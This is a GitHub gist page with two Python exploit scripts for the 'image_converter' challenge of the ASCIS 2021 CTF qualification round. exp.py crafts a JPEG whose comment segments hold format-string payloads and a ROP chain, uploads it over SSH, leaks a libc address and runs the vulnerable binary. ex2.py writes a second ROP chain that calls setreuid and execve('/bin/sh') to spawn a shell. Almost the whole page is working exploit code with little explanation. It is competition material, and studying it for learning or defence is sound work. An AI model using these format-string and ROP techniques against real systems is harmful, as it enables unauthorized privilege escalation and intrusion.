Skip to content

Instantly share code, notes, and snippets.

@kungfulon

kungfulon/ex2.py

Last active October 19, 2021 02:05
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kungfulon/821f253b55fe77ef40e9cc6958e560f6 to your computer and use it in GitHub Desktop.
Save kungfulon/821f253b55fe77ef40e9cc6958e560f6 to your computer and use it in GitHub Desktop.
Download ZIP
ASCIS 2021 Qualification Round - image_converter
Raw
ex2.py
#!/usr/bin/env python3
import struct
import sys
libc = int(sys.argv[1], 16) - 0x270b3
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
def p64(x) -> bytes:
return struct.pack('<Q', x)
with open('/tmp/p', 'wb') as f:
f.write(p64(0x4019e3)) # pop rdi; ret
f.write(p64(1001))
f.write(p64(0x401f20)) # pop rsi; ret
f.write(p64(1001))
f.write(p64(libc + setreuid))
f.write(p64(0x4019e3)) # pop rdi; ret
f.write(p64(libc + binsh))
f.write(p64(0x401f20)) # pop rsi; ret
f.write(p64(0x0))
f.write(p64(libc + poprdx)) # pop rdx; pop r12; ret
f.write(p64(0x0))
f.write(p64(0x0))
f.write(p64(libc + execve))
Raw
exp.py
#!/usr/bin/env python3
from pwn import *
ss = ssh('ctf', 'ip', 20121, 'password')
setreuid = 0x117ab0
setregid = 0x117b50
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
def make_comment(comment) -> bytes:
return b'\xff\xfe' + p16(len(comment) + 2, endian='big') + comment
data = base64.b64decode('''
/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAIBAQIBAQICAgICAgICAwUDAwMDAwYEBAMFBwYHBwcG
BwcICQsJCAgKCAcHCg0KCgsMDAwMBwkODw0MDgsMDAz/2wBDAQICAgMDAwYDAwYMCAcIDAwMDAwM
DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAz/wAARCAABAAEDASIA
AhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQA
AAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3
ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWm
p6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEA
AwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSEx
BhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElK
U1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3
uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD9/KKK
KAP/2Q==
''')
with open('/tmp/x.jpg', 'wb') as f:
rop = b'rb'.ljust(8, b'\x00') # rbp
rop += p64(0x0) # r12
rop += p64(0x0) # r13
rop += p64(0x0) # r14
rop += p64(0x0) # r15
rop += p64(0x4011D0) # fopen
rop += p64(0x4019E3) # pop rdi; ret
rop += p64(0x432168)
rop += p64(0x405665) # mov qword ptr [rdi + 0xc0], rax; ret
rop += p64(0x4019E3) # pop rdi; ret
rop += p64(0x432200)
rop += p64(0x40E010) # stbi__get8
rop += p64(0x401d85) # pop rsp; ret
rop += p64(0x432238)
dat = make_comment(b'\n%175$p\n'.ljust(135, b'\x00'))
dat += make_comment(b'%1$7344c%139$ln%1$58256c%140$hn'.ljust(124, b'\x00') + (p64(0x432210) + p64(0x432212)).ljust(128, b'B'))
dat += make_comment(b'%1$1c%139$n%1$4095c%140$n'.ljust(124, b'\x00') + (p64(0x432230) + p64(0x432234)).ljust(128, b'B'))
dat += make_comment(b'%1$31277c%139$ln%1$34324c%140$hn'.ljust(124, b'\x00') + (p64(0x432060) + p64(0x432062)).ljust(128, b'B'))
dat += make_comment(b'/tmp/p'.ljust(124, b'\x00') + rop.ljust(128, b'B'))
f.write(data[:-2] + dat + data[-2:])
ss.upload('/tmp/x.jpg', '/tmp/x.jpg')
ss.upload('ex2.py', '/tmp/ex2.py')
ss.run_to_end('rm /tmp/p')
ss.run_to_end('mkfifo /tmp/p')
p = ss.system('CHECK_COM_INFO=1 /home/ctf/image_converter /tmp/x.jpg')
p.recvline()
ss.run_to_end('python3 /tmp/ex2.py %s' % p.recvline().decode('ascii'))
ss.run_to_end('rm /tmp/p /tmp/x.jpg /tmp/ex2.py')
sleep(1)
p.clean()
p.sendline(b'newgrp')
p.interactive('')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment